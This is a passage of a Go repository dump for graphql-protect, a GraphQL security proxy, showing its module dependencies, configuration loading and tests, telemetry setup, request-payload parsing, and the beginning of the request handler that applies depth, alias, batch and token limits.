go.opentelemetry.io/contrib/propagators/autoprop v0.60.0 15 | go.opentelemetry.io/otel v1.35.0 16 | go.opentelemetry.io/otel/sdk v1.35.0 17 | google.golang.org/api v0.232.0 18 | gopkg.in/yaml.v3 v3.0.1 19 | ) 20 | 21 | require ( 22 | cel.dev/expr v0.20.0 // indirect 23 | cloud.google.com/go v0.120.1 // indirect 24 | cloud.google.com/go/auth v0.16.1 // indirect 25 | cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect 26 | cloud.google.com/go/compute/metadata v0.6.0 // indirect 27 | cloud.google.com/go/iam v1.5.2 // indirect 28 | cloud.google.com/go/monitoring v1.24.0 // indirect 29 | github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.27.0 // indirect 30 | github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0 // indirect 31 | github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.51.0 // indirect 32 | github.com/agnivade/levenshtein v1.2.1 // indirect 33 | github.com/beorn7/perks v1.0.1 // indirect 34 | github.com/cenkalti/backoff/v4 v4.3.0 // indirect 35 | github.com/cespare/xxhash/v2 v2.3.0 // indirect 36 | github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42 // indirect 37 | github.com/davecgh/go-spew v1.1.1 // indirect 38 | github.com/envoyproxy/go-control-plane/envoy v1.32.4 // indirect 39 | github.com/envoyproxy/protoc-gen-validate v1.2.1 // indirect 40 | github.com/felixge/httpsnoop v1.0.4 // indirect 41 | github.com/go-jose/go-jose/v4 v4.0.5 // indirect 42 | github.com/go-logr/logr v1.4.2 // indirect 43 | github.com/go-logr/stdr v1.2.2 // indirect 44 | github.com/google/s2a-go v0.1.9 // indirect 45 | github.com/google/uuid v1.6.0 // indirect 46 | github.com/googleapis/enterprise-certificate-proxy v0.3.6 // indirect 47 | github.com/googleapis/gax-go/v2 v2.14.1 // indirect 48 | github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.1 // indirect 49 | github.com/mattn/go-runewidth v0.0.16 // indirect 50 | github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect 51 | github.com/planetscale/vtprotobuf v0.6.1-0.20241011083415-71c992bc3c87 // indirect 52 | github.com/pmezard/go-difflib v1.0.0 // indirect 53 | github.com/prometheus/client_model v0.6.1 // indirect 54 | github.com/prometheus/common v0.62.0 // indirect 55 | github.com/prometheus/procfs v0.15.1 // indirect 56 | github.com/rivo/uniseg v0.4.7 // indirect 57 | github.com/spiffe/go-spiffe/v2 v2.5.0 // indirect 58 | github.com/zeebo/errs v1.4.0 // indirect 59 | go.opentelemetry.io/auto/sdk v1.1.0 // indirect 60 | go.opentelemetry.io/contrib/bridges/prometheus v0.60.0 // indirect 61 | go.opentelemetry.io/contrib/detectors/gcp v1.35.0 // indirect 62 | go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.60.0 // indirect 63 | go.opentelemetry.io/contrib/propagators/aws v1.35.0 // indirect 64 | go.opentelemetry.io/contrib/propagators/b3 v1.35.0 // indirect 65 | go.opentelemetry.io/contrib/propagators/jaeger v1.35.0 // indirect 66 | go.opentelemetry.io/contrib/propagators/ot v1.35.0 // indirect 67 | go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc v0.11.0 // indirect 68 | go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploghttp v0.11.0 // indirect 69 | go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetricgrpc v1.35.0 // indirect 70 | go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetrichttp v1.35.0 // indirect 71 | go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.35.0 // indirect 72 | go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.35.0 // indirect 73 | go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.35.0 // indirect 74 | go.opentelemetry.io/otel/exporters/prometheus v0.57.0 // indirect 75 | go.opentelemetry.io/otel/exporters/stdout/stdoutlog v0.11.0 // indirect 76 | go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.35.0 // indirect 77 | go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.35.0 // indirect 78 | go.opentelemetry.io/otel/log v0.11.0 // indirect 79 | go.opentelemetry.io/otel/metric v1.35.0 // indirect 80 | go.opentelemetry.io/otel/sdk/log v0.11.0 // indirect 81 | go.opentelemetry.io/otel/sdk/metric v1.35.0 // indirect 82 | go.opentelemetry.io/otel/trace v1.35.0 // indirect 83 | go.opentelemetry.io/proto/otlp v1.5.0 // indirect 84 | go.uber.org/multierr v1.11.0 // indirect 85 | golang.org/x/crypto v0.37.0 // indirect 86 | golang.org/x/net v0.39.0 // indirect 87 | golang.org/x/oauth2 v0.30.0 // indirect 88 | golang.org/x/sync v0.14.0 // indirect 89 | golang.org/x/sys v0.32.0 // indirect 90 | golang.org/x/text v0.24.0 // indirect 91 | golang.org/x/time v0.11.0 // indirect 92 | google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb // indirect 93 | google.golang.org/genproto/googleapis/api v0.0.0-20250425173222-7b384671a197 // indirect 94 | google.golang.org/genproto/googleapis/rpc v0.0.0-20250428153025-10db94c68c34 // indirect 95 | google.golang.org/grpc v1.72.0 // indirect 96 | google.golang.org/protobuf v1.36.6 // indirect 97 | ) 98 | -------------------------------------------------------------------------------- /graphql-protect.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /internal/app/config/config.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "errors" 5 | "github.com/supportivefe/graphql-protect/internal/app/http" 6 | "github.com/supportivefe/graphql-protect/internal/app/log" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/aliases" 9 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/enforce_post" 12 | "github.com/supportivefe/graphql-protect/internal/business/rules/max_depth" 13 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 14 | "github.com/supportivefe/graphql-protect/internal/business/schema" 15 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 16 | "github.com/supportivefe/graphql-protect/internal/http/proxy" 17 | y "gopkg.in/yaml.v3" 18 | "os" 19 | ) 20 | 21 | var ErrConfigFileNotFound = errors.New("config file could not be found, defaults applied") 22 | 23 | type Config struct { 24 | Web http.Config `yaml:"web"` 25 | Schema schema.Config `yaml:"schema"` 26 | Target proxy.Config `yaml:"target"` 27 | PersistedOperations trusteddocuments.Config `yaml:"persisted_operations"` 28 | ObfuscateValidationErrors bool `yaml:"obfuscate_validation_errors"` 29 | ObfuscateUpstreamErrors bool `yaml:"obfuscate_upstream_errors"` 30 | BlockFieldSuggestions block_field_suggestions.Config `yaml:"block_field_suggestions"` 31 | MaxTokens tokens.Config `yaml:"max_tokens"` 32 | MaxAliases aliases.Config `yaml:"max_aliases"` 33 | EnforcePost enforce_post.Config `yaml:"enforce_post"` 34 | MaxDepth max_depth.Config `yaml:"max_depth"` 35 | MaxBatch batch.Config `yaml:"max_batch"` 36 | AccessLogging accesslogging.Config `yaml:"access_logging"` 37 | Log log.Config `yaml:"log"` 38 | LogGraphqlErrors bool `yaml:"log_graphql_errors"` 39 | } 40 | 41 | func (c Config) String() string { 42 | marshal, err := y.Marshal(c) 43 | if err != nil { 44 | return "" 45 | } 46 | 47 | return string(marshal) 48 | } 49 | 50 | // NewConfig initializes the runtime configuration. 51 | // It uses defaults, and applies any user overrides to it 52 | // If no configuration file can be found, the defaults will be returned the ErrConfigFileNotFound error 53 | // if the configuration file can be found, but cannot be unmarshalled, an error will be returned 54 | func NewConfig(configPath string) (*Config, error) { 55 | cfg := defaults() 56 | 57 | bts, err := os.ReadFile(configPath) 58 | if err != nil { 59 | return &cfg, errors.Join(ErrConfigFileNotFound, err) 60 | } 61 | 62 | err = y.Unmarshal(bts, &cfg) 63 | if err != nil { 64 | return nil, err 65 | } 66 | 67 | return &cfg, nil 68 | } 69 | 70 | func defaults() Config { 71 | return Config{ 72 | Web: http.DefaultConfig(), 73 | Schema: schema.DefaultConfig(), 74 | Target: proxy.DefaultConfig(), 75 | PersistedOperations: trusteddocuments.DefaultConfig(), 76 | ObfuscateValidationErrors: false, 77 | ObfuscateUpstreamErrors: true, 78 | BlockFieldSuggestions: block_field_suggestions.DefaultConfig(), 79 | MaxTokens: tokens.DefaultConfig(), 80 | MaxAliases: aliases.DefaultConfig(), 81 | EnforcePost: enforce_post.DefaultConfig(), 82 | MaxDepth: max_depth.DefaultConfig(), 83 | MaxBatch: batch.DefaultConfig(), 84 | AccessLogging: accesslogging.DefaultConfig(), 85 | Log: log.DefaultConfig(), 86 | LogGraphqlErrors: false, 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /internal/app/config/config_test.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/app/http" 5 | "github.com/supportivefe/graphql-protect/internal/app/log" 6 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/aliases" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 9 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/enforce_post" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/max_depth" 12 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 13 | "github.com/supportivefe/graphql-protect/internal/business/schema" 14 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 15 | "github.com/supportivefe/graphql-protect/internal/http/proxy" 16 | "github.com/stretchr/testify/assert" 17 | "gopkg.in/yaml.v3" 18 | "os" 19 | "testing" 20 | "time" 21 | ) 22 | 23 | func TestNewConfig(t *testing.T) { 24 | tests := []struct { 25 | name string 26 | applyConfig func(file *os.File) 27 | want *Config 28 | wantErr bool 29 | }{ 30 | { 31 | name: "Assures defaults are applied correctly", 32 | applyConfig: func(_ *os.File) { 33 | 34 | }, 35 | want: func() *Config { 36 | cfg := defaults() 37 | return &cfg 38 | }(), 39 | wantErr: false, 40 | }, 41 | { 42 | name: "YAML overrides are applied", 43 | applyConfig: func(file *os.File) { 44 | _, _ = file.Write([]byte(` 45 | web: 46 | read_timeout: 1s 47 | write_timeout: 1s 48 | idle_timeout: 1s 49 | shutdown_timeout: 1s 50 | host: host 51 | path: path 52 | request_body_max_bytes: 2048 53 | 54 | target: 55 | host: host 56 | timeout: 1s 57 | keep_alive: 1s 58 | 59 | schema: 60 | path: "path" 61 | auto_reload: 62 | enabled: false 63 | interval: 1s 64 | 65 | obfuscate_validation_errors: true 66 | obfuscate_upstream_errors: false 67 | 68 | persisted_operations: 69 | enabled: true 70 | enable_debug_endpoint: true 71 | reject_on_failure: false 72 | loader: 73 | type: gcp 74 | location: some-bucket 75 | reload: 76 | enabled: true 77 | interval: 1s 78 | timeout: 1s 79 | 80 | max_aliases: 81 | enabled: false 82 | max: 1 83 | reject_on_failure: false 84 | 85 | block_field_suggestions: 86 | enabled: false 87 | mask: mask 88 | 89 | max_depth: 90 | enabled: false 91 | max: 1 92 | reject_on_failure: false 93 | field: 94 | enabled: false 95 | max: 1 96 | reject_on_failure: false 97 | list: 98 | enabled: false 99 | max: 1 100 | reject_on_failure: false 101 | 102 | max_tokens: 103 | enabled: false 104 | max: 1 105 | reject_on_failure: false 106 | 107 | max_batch: 108 | enabled: false 109 | max: 1 110 | reject_on_failure: false 111 | 112 | enforce_post: 113 | enabled: false 114 | 115 | access_logging: 116 | enabled: false 117 | include_headers: 118 | - Authorization 119 | include_operation_name: false 120 | include_variables: false 121 | include_payload: true 122 | 123 | log: 124 | format: text 125 | 126 | `)) 127 | }, 128 | want: &Config{ 129 | Web: http.Config{ 130 | ReadTimeout: 1 * time.Second, 131 | WriteTimeout: 1 * time.Second, 132 | IdleTimeout: 1 * time.Second, 133 | ShutdownTimeout: 1 * time.Second, 134 | Host: "host", 135 | Path: "path", 136 | RequestBodyMaxBytes: 2048, 137 | }, 138 | ObfuscateValidationErrors: true, 139 | ObfuscateUpstreamErrors: false, 140 | Schema: schema.Config{ 141 | Path: "path", 142 | AutoReload: struct { 143 | Enabled bool `yaml:"enabled"` 144 | Interval time.Duration `yaml:"interval"` 145 | }(struct { 146 | Enabled bool 147 | Interval time.Duration 148 | }{Enabled: false, Interval: 1 * time.Second}), 149 | }, 150 | Target: proxy.Config{ 151 | Timeout: 1 * time.Second, 152 | KeepAlive: 1 * time.Second, 153 | Host: "host", 154 | }, 155 | PersistedOperations: trusteddocuments.Config{ 156 | Enabled: true, 157 | EnableDebugEndpoint: true, 158 | Loader: trusteddocuments.LoaderConfig{ 159 | Type: "gcp", 160 | Location: "some-bucket", 161 | Reload: struct { 162 | Enabled bool `yaml:"enabled"` 163 | Interval time.Duration `yaml:"interval"` 164 | Timeout time.Duration `yaml:"timeout"` 165 | }{ 166 | Enabled: true, 167 | Interval: 1 * time.Second, 168 | Timeout: 1 * time.Second, 169 | }, 170 | }, 171 | RejectOnFailure: false, 172 | }, 173 | BlockFieldSuggestions: block_field_suggestions.Config{ 174 | Enabled: false, 175 | Mask: "mask", 176 | }, 177 | MaxTokens: tokens.Config{ 178 | Enabled: false, 179 | Max: 1, 180 | RejectOnFailure: false, 181 | }, 182 | MaxAliases: aliases.Config{ 183 | Enabled: false, 184 | Max: 1, 185 | RejectOnFailure: false, 186 | }, 187 | EnforcePost: enforce_post.Config{ 188 | Enabled: false, 189 | }, 190 | MaxDepth: max_depth.Config{ 191 | Enabled: false, 192 | Max: 1, 193 | RejectOnFailure: false, 194 | Field: max_depth.MaxRule{ 195 | Enabled: false, 196 | Max: 1, 197 | RejectOnFailure: false, 198 | }, 199 | List: max_depth.MaxRule{ 200 | Enabled: false, 201 | Max: 1, 202 | RejectOnFailure: false, 203 | }, 204 | }, 205 | MaxBatch: batch.Config{ 206 | Enabled: false, 207 | Max: 1, 208 | RejectOnFailure: false, 209 | }, 210 | AccessLogging: accesslogging.Config{ 211 | Enabled: false, 212 | IncludedHeaders: []string{"Authorization"}, 213 | IncludeOperationName: false, 214 | IncludeVariables: false, 215 | IncludePayload: true, 216 | }, 217 | Log: log.Config{ 218 | Format: log.TextFormat, 219 | }, 220 | }, 221 | wantErr: false, 222 | }, 223 | } 224 | for _, tt := range tests { 225 | t.Run(tt.name, func(t *testing.T) { 226 | file, _ := os.CreateTemp("", "") 227 | defer func() { 228 | _ = os.Remove(file.Name()) 229 | }() 230 | 231 | tt.applyConfig(file) 232 | 233 | got, err := NewConfig(file.Name()) 234 | assert.NoError(t, err) 235 | 236 | assert.Equal(t, tt.want, got) 237 | }) 238 | } 239 | } 240 | 241 | // WriteDefaultConfigToYaml is used to write a configuration file with pure defaults to a yaml file. 242 | // This makes it really easy to copy-paste it onto documentation examples. 243 | func TestWriteDefaultConfigToYaml(t *testing.T) { 244 | t.Skip("not actually a test, abusing the test for easy generation of default configuration file") 245 | 246 | cfg := defaults() 247 | 248 | file, err := os.OpenFile("default-config.yml", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600) 249 | if err != nil { 250 | assert.NoError(t, err) 251 | return 252 | } 253 | defer file.Close() 254 | 255 | enc := yaml.NewEncoder(file) 256 | 257 | _ = enc.Encode(cfg) 258 | } 259 | -------------------------------------------------------------------------------- /internal/app/http/http.go: -------------------------------------------------------------------------------- 1 | package http 2 | 3 | import "time" 4 | 5 | const kilobyte100 = 102_400 // 100kb 6 | 7 | type Config struct { 8 | ReadTimeout time.Duration `yaml:"read_timeout"` 9 | WriteTimeout time.Duration `yaml:"write_timeout"` 10 | IdleTimeout time.Duration `yaml:"idle_timeout"` 11 | ShutdownTimeout time.Duration `yaml:"shutdown_timeout"` 12 | Host string `yaml:"host"` 13 | // or maybe we just want to listen on everything and forward 14 | Path string `yaml:"path"` 15 | // DebugHost string `yaml:"debug_host"` 16 | RequestBodyMaxBytes int `yaml:"request_body_max_bytes"` 17 | } 18 | 19 | func DefaultConfig() Config { 20 | return Config{ 21 | ReadTimeout: 5 * time.Second, 22 | WriteTimeout: 10 * time.Second, 23 | IdleTimeout: 2 * time.Minute, 24 | ShutdownTimeout: 20 * time.Second, 25 | Host: "0.0.0.0:8080", 26 | Path: "/graphql", 27 | RequestBodyMaxBytes: kilobyte100, 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /internal/app/log/log.go: -------------------------------------------------------------------------------- 1 | package log 2 | 3 | import ( 4 | "log/slog" 5 | "os" 6 | ) 7 | 8 | type Config struct { 9 | Format string `yaml:"format"` 10 | } 11 | 12 | func DefaultConfig() Config { 13 | return Config{ 14 | Format: "json", 15 | } 16 | } 17 | 18 | var ( 19 | JSONFormat = "json" 20 | TextFormat = "text" 21 | ) 22 | 23 | func NewLogger(cfg Config) *slog.Logger { 24 | if cfg.Format == TextFormat { 25 | return slog.Default() 26 | } 27 | return slog.New(slog.NewJSONHandler(os.Stdout, nil)) 28 | } 29 | -------------------------------------------------------------------------------- /internal/app/metrics/metrics.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/prometheus/client_golang/prometheus/collectors" 6 | "regexp" 7 | ) 8 | 9 | func init() { 10 | // Register metrics from GoCollector collecting statistics from the Go Runtime. 11 | // This enabled default, recommended metrics with the additional, recommended metric for 12 | // goroutine scheduling latencies histogram that is currently bit too expensive for the default option. 13 | // 14 | // See the related GopherConUK talk to learn more: https://www.youtube.com/watch?v=18dyI_8VFa0 15 | 16 | // Unregister the default GoCollector. 17 | prometheus.Unregister(collectors.NewGoCollector()) 18 | 19 | // Register the default GoCollector with a custom config. 20 | prometheus.MustRegister( 21 | collectors.NewGoCollector( 22 | collectors.WithGoCollectorRuntimeMetrics( 23 | collectors.GoRuntimeMetricsRule{Matcher: regexp.MustCompile("/sched/latencies:seconds")}, 24 | ), 25 | ), 26 | ) 27 | } 28 | -------------------------------------------------------------------------------- /internal/app/otel/otel.go: -------------------------------------------------------------------------------- 1 | package otel 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "go.opentelemetry.io/contrib/exporters/autoexport" 7 | "go.opentelemetry.io/contrib/propagators/autoprop" 8 | "go.opentelemetry.io/otel" 9 | "go.opentelemetry.io/otel/sdk/resource" 10 | "go.opentelemetry.io/otel/sdk/trace" 11 | semconv "go.opentelemetry.io/otel/semconv/v1.24.0" 12 | ) 13 | 14 | func SetupOTELSDK(ctx context.Context, version string) (shutdown func(context.Context) error, err error) { 15 | var shutdownFuncs []func(context.Context) error 16 | // shutdown calls cleanup functions registered via shutdownFuncs. 17 | // The errors from the calls are joined. 18 | // Each registered cleanup will be invoked once. 19 | shutdown = func(ctx context.Context) error { 20 | var err error 21 | for _, fn := range shutdownFuncs { 22 | err = errors.Join(err, fn(ctx)) 23 | } 24 | shutdownFuncs = nil 25 | return err 26 | } 27 | 28 | // handleErr calls shutdown for cleanup and makes sure that all errors are returned. 29 | handleErr := func(inErr error) { 30 | err = errors.Join(inErr, shutdown(ctx)) 31 | } 32 | 33 | // NewTextMapPropagator returns a TraceContext and Baggage propagator by 34 | // default. The response of this function can be directly registered with 35 | // the go.opentelemetry.io/otel package. 36 | otel.SetTextMapPropagator(autoprop.NewTextMapPropagator()) 37 | 38 | // Set up trace provider. 39 | tracerProvider, err := newTraceProvider(ctx, version) 40 | if err != nil { 41 | handleErr(err) 42 | return 43 | } 44 | shutdownFuncs = append(shutdownFuncs, tracerProvider.Shutdown) 45 | otel.SetTracerProvider(tracerProvider) 46 | 47 | return 48 | } 49 | 50 | func newTraceProvider(ctx context.Context, version string) (*trace.TracerProvider, error) { 51 | traceExporter, err := autoexport.NewSpanExporter(ctx) 52 | if err != nil { 53 | return nil, err 54 | } 55 | 56 | traceProvider := trace.NewTracerProvider( 57 | trace.WithBatcher(traceExporter), 58 | trace.WithResource(resource.NewWithAttributes( 59 | semconv.SchemaURL, 60 | semconv.ServiceVersionKey.String(version), 61 | )), 62 | ) 63 | return traceProvider, nil 64 | } 65 | -------------------------------------------------------------------------------- /internal/business/gql/gql.go: -------------------------------------------------------------------------------- 1 | package gql 2 | 3 | import ( 4 | "bytes" 5 | "encoding/json" 6 | "errors" 7 | "github.com/prometheus/client_golang/prometheus" 8 | "io" 9 | "net/http" 10 | ) 11 | 12 | var ( 13 | requestMaxBodyBytesExceededCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 14 | Namespace: "graphql_protect", 15 | Subsystem: "http", 16 | Name: "request_max_body_bytes_exceeded_count", 17 | Help: "Tracks the occurrence of requests that exceed the max body bytes limitation", 18 | }, 19 | []string{}, 20 | ) 21 | ) 22 | 23 | func init() { 24 | prometheus.MustRegister(requestMaxBodyBytesExceededCounter) 25 | } 26 | 27 | type RequestData struct { 28 | OperationName string `json:"operationName,omitempty"` 29 | Variables map[string]interface{} `json:"variables,omitempty"` 30 | Query string `json:"query,omitempty"` 31 | Extensions Extensions `json:"extensions,omitempty"` 32 | } 33 | 34 | type Extensions struct { 35 | PersistedQuery *PersistedQuery `json:"persistedQuery,omitempty"` 36 | } 37 | 38 | type PersistedQuery struct { 39 | Sha256Hash string `json:"sha256Hash"` 40 | } 41 | 42 | func ParseRequestPayload(r *http.Request) ([]RequestData, error) { 43 | if r.ContentLength < 1 { 44 | return []RequestData{}, nil 45 | } 46 | 47 | body, err := io.ReadAll(r.Body) 48 | if err != nil { 49 | var maxBytesError *http.MaxBytesError 50 | if errors.As(err, &maxBytesError) { 51 | requestMaxBodyBytesExceededCounter.WithLabelValues().Inc() 52 | } 53 | return []RequestData{}, err 54 | } 55 | // Replace the body with a new reader after reading from the original 56 | r.Body = io.NopCloser(bytes.NewBuffer(body)) 57 | 58 | body = bytes.TrimSpace(body) 59 | // assume its a batch request 60 | if body[0] == '[' { 61 | var data []RequestData 62 | err = json.Unmarshal(body, &data) 63 | if err != nil { 64 | return []RequestData{}, err 65 | } 66 | return data, nil 67 | } 68 | var data RequestData 69 | err = json.Unmarshal(body, &data) 70 | if err != nil { 71 | return []RequestData{}, err 72 | } 73 | return []RequestData{data}, nil 74 | } 75 | -------------------------------------------------------------------------------- /internal/business/gql/gql_test.go: -------------------------------------------------------------------------------- 1 | package gql 2 | 3 | import ( 4 | "bytes" 5 | "fmt" 6 | "net/http" 7 | "net/http/httptest" 8 | "reflect" 9 | "testing" 10 | ) 11 | 12 | func TestParseRequestPayload(t *testing.T) { 13 | type args struct { 14 | r *http.Request 15 | } 16 | tests := []struct { 17 | name string 18 | args args 19 | want []RequestData 20 | wantErr bool 21 | }{ 22 | { 23 | name: "parses regular operation correctly", 24 | args: args{ 25 | r: func() *http.Request { 26 | payload := ` 27 | { 28 | "query": "something", 29 | "variables": { 30 | "baz": "foobar" 31 | }, 32 | "extensions": { 33 | "foo": "bar" 34 | } 35 | } 36 | ` 37 | body := bytes.NewBuffer([]byte(payload)) 38 | return httptest.NewRequest("POST", "/graphql", body) 39 | }(), 40 | }, 41 | want: []RequestData{ 42 | { 43 | Variables: map[string]interface{}{ 44 | "baz": "foobar", 45 | }, 46 | Query: "something", 47 | Extensions: Extensions{}, 48 | }, 49 | }, 50 | wantErr: false, 51 | }, 52 | { 53 | name: "parses batched operation correctly", 54 | args: args{ 55 | r: func() *http.Request { 56 | payload := ` 57 | [ 58 | { 59 | "query": "query batched 1", 60 | "variables": { 61 | "baz": "variables batched 1" 62 | }, 63 | "extensions": { 64 | "foo": "extension batched 1" 65 | } 66 | }, 67 | { 68 | "query": "query batched 2", 69 | "variables": { 70 | "baz": "variables batched 2" 71 | }, 72 | "extensions": { 73 | "foo": "extensions batched 2" 74 | } 75 | } 76 | ] 77 | ` 78 | body := bytes.NewBuffer([]byte(payload)) 79 | return httptest.NewRequest("POST", "/graphql", body) 80 | }(), 81 | }, 82 | want: []RequestData{ 83 | { 84 | Variables: map[string]interface{}{ 85 | "baz": "variables batched 1", 86 | }, 87 | Query: "query batched 1", 88 | Extensions: Extensions{}, 89 | }, 90 | { 91 | Variables: map[string]interface{}{ 92 | "baz": "variables batched 2", 93 | }, 94 | Query: "query batched 2", 95 | Extensions: Extensions{}, 96 | }, 97 | }, 98 | wantErr: false, 99 | }, 100 | { 101 | name: "Handles request without body gracefully", 102 | args: args{ 103 | r: func() *http.Request { 104 | return httptest.NewRequest("POST", "/graphql", nil) 105 | }(), 106 | }, 107 | want: []RequestData{}, 108 | wantErr: false, 109 | }, 110 | } 111 | for _, tt := range tests { 112 | t.Run(tt.name, func(t *testing.T) { 113 | got, err := ParseRequestPayload(tt.args.r) 114 | if (err != nil) != tt.wantErr { 115 | t.Errorf("ParseRequestPayload() error = %v, wantErr %v", err, tt.wantErr) 116 | return 117 | } 118 | if !reflect.DeepEqual(got, tt.want) { 119 | t.Errorf("ParseRequestPayload() got = %v, want %v", got, tt.want) 120 | } 121 | }) 122 | } 123 | } 124 | 125 | func BenchmarkCheckJSONType(b *testing.B) { 126 | // Create a sample JSON object 127 | jsonObject := []byte(`{ 128 | "query": "something", 129 | "variables": { 130 | "baz": "foobar" 131 | }, 132 | "extensions": { 133 | "foo": "bar" 134 | } 135 | },`) 136 | 137 | // Create a sample JSON array 138 | jsonArray := []byte(fmt.Sprintf("[%[1]s, %[1]s, %[1]s, %[1]s, %[1]s]", jsonObject)) 139 | 140 | for i := 0; i < b.N; i++ { 141 | // Benchmark decoding a JSON object 142 | b.Run("JSON Object", func(b *testing.B) { 143 | for j := 0; j < b.N; j++ { 144 | r := httptest.NewRequest("POST", "/graphql", bytes.NewBuffer(jsonObject)) 145 | _, _ = ParseRequestPayload(r) 146 | } 147 | }) 148 | 149 | // Benchmark decoding a JSON array 150 | b.Run("JSON Array", func(b *testing.B) { 151 | for j := 0; j < b.N; j++ { 152 | r := httptest.NewRequest("POST", "/graphql", bytes.NewBuffer(jsonArray)) 153 | _, _ = ParseRequestPayload(r) 154 | } 155 | }) 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /internal/business/protect/protect.go: -------------------------------------------------------------------------------- 1 | package protect 2 | 3 | import ( 4 | "encoding/json" 5 | "errors" 6 | "github.com/supportivefe/graphql-protect/internal/app/config" 7 | "github.com/supportivefe/graphql-protect/internal/business/gql" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 9 | "github.com/supportivefe/graphql-protect/internal/business/rules/aliases" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/enforce_post" 12 | "github.com/supportivefe/graphql-protect/internal/business/rules/max_depth" 13 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 14 | "github.com/supportivefe/graphql-protect/internal/business/schema" 15 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 16 | "github.com/vektah/gqlparser/v2/ast" 17 | "github.com/vektah/gqlparser/v2/gqlerror" 18 | "github.com/vektah/gqlparser/v2/parser" 19 | "github.com/vektah/gqlparser/v2/validator" 20 | "go.opentelemetry.io/otel" 21 | "log/slog" 22 | "net/http" 23 | ) 24 | 25 | var ( 26 | ErrRedacted = errors.New("error(s) redacted") 27 | 28 | tracer = otel.Tracer("github.com/supportivefe/graphql-protect/internal/business/protect") 29 | ) 30 | 31 | type GraphQLProtect struct { 32 | log *slog.Logger 33 | cfg *config.Config 34 | schema *schema.Provider 35 | tokens *tokens.MaxTokensRule 36 | maxBatch *batch.MaxBatchRule 37 | accessLogging *accesslogging.AccessLogging 38 | next http.Handler 39 | preFilterChain func(handler http.Handler) http.Handler 40 | } 41 | 42 | func NewGraphQLProtect(log *slog.Logger, cfg *config.Config, po *trusteddocuments.Handler, schema *schema.Provider, upstreamHandler http.Handler) (*GraphQLProtect, error) { 43 | aliases.NewMaxAliasesRule(cfg.MaxAliases) 44 | max_depth.NewMaxDepthRule(log, cfg.MaxDepth) 45 | maxBatch, err := batch.NewMaxBatch(cfg.MaxBatch) 46 | if err != nil { 47 | log.Warn("Error initializing maximum batch protection", "err", err) 48 | } 49 | 50 | accessLogging := accesslogging.NewAccessLogging(cfg.AccessLogging, log) 51 | 52 | enforcePostMethod := enforce_post.EnforcePostMethod(cfg.EnforcePost) 53 | 54 | return &GraphQLProtect{ 55 | log: log, 56 | cfg: cfg, 57 | schema: schema, 58 | tokens: tokens.MaxTokens(cfg.MaxTokens), 59 | maxBatch: maxBatch, 60 | accessLogging: accessLogging, 61 | preFilterChain: func(next http.Handler) http.Handler { 62 | return enforcePostMethod(po.SwapHashForQuery(next)) 63 | }, 64 | next: upstreamHandler, 65 | }, nil 66 | } 67 | 68 | func (p *GraphQLProtect) ServeHTTP(w http.ResponseWriter, r *http.Request) { 69 | ctx, span := tracer.Start(r.Context(), "Handle Request") 70 | defer span.End() 71 | p.preFilterChain(http.HandlerFunc(p.handle)).ServeHTTP(w, r.WithContext(ctx)) 72 | } 73 | 74 | func (p *GraphQLProtect) handle(w http.ResponseWriter, r *http.Request) { 75 | if p.cfg.Web.RequestBodyMaxBytes != 0 { 76 | r.Body = http.MaxBytesReader(w, r.Body, int64(p.cfg.Web.RequestBodyMaxBytes)) 77 | } 78 | 79 | payloads, validationErrors := p.validateRequest(r) 80 | 81 | p.accessLogging.Log(payloads, r.Header) 82 | 83 | if len(validationErrors) > 0 { 84 | if p.cfg.ObfuscateValidationErrors { 85 | validationErrors = 